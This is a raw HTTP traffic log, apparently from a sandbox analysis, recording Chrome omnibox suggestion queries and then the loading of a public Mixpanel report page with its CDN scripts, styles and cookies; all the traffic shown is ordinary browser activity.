                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWf&oit=3&cp=18&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQ&oit=3&cp=19&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQu&oit=3&cp=20&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuh&oit=3&cp=21&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi&oit=3&cp=22&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1&oit=3&cp=23&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1a&oit=3&cp=24&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aN&oit=3&cp=25&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNT&oit=3&cp=26&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS&oit=3&cp=27&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS1&oit=3&cp=28&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16&oit=3&cp=29&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WP&oit=3&cp=31&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPX&oit=3&cp=32&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXL&oit=3&cp=33&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLx&oit=3&cp=34&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLxR&oit=3&cp=35&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLxRfi&oit=3&cp=37&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=hmixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLxRfi&oit=3&cp=1&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httmixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLxRfi&oit=3&cp=3&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httpmixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLxRfi&oit=3&cp=4&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httpsmixpanel.com%2Fp%2FFWfQuhi1aNTS16WPXLxRfi&oit=3&cp=5&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CPyDywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /p/FWfQuhi1aNTS16WPXLxRfi HTTP/1.1Host: mixpanel.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /public/FWfQuhi1aNTS16WPXLxRfi HTTP/1.1Host: mixpanel.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp__origin_referrer=""
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/85c7228ae40a031f663b/common/iron.min.css HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/a54fa472f3ee8b06515c/reports/global-styles.min.css HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/c0f349f0313b5049b340/runtime.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/marketing/fonts/apercu/web/5.008/apercu-regular-pro.woff2 HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.mxpnl.com/static/asset-cache/a54fa472f3ee8b06515c/reports/global-styles.min.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/82535fa77fbcac7f7fd5/common/polyfills.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/129db95fea2e103babb6/common/node_modules.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/5040f4c826dd22412815/gdpr.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /libs/mixpanel.dev.min.js HTTP/1.1Host: mixpanel.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfiAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp__origin_referrer=""
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/c583b2e7abf6b4a3b6d0/common/iron.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/d7da5d0bc348d0b28d1f/reports/global-util.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/58c8916cbf9f3deb44c2/routes.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/d3b24e73f4b284a795ab/reports/onload-init.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-aliveOrigin: https://mixpanel.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /libs/mixpanel-recorder.dev.min.js HTTP/1.1Host: mixpanel.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfiAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp__origin_referrer=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D
                Source: global trafficHTTP traffic detected: GET /api/app/gdpr HTTP/1.1Host: mixpanel.comConnection: keep-alivetraceparent: 00-98ca1476833b1c16066039dd3267f50c-3d9f9ac8e282c524-01sec-ch-ua-platform: "Windows"Authorization: SessionUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfiAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp__origin_referrer=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; 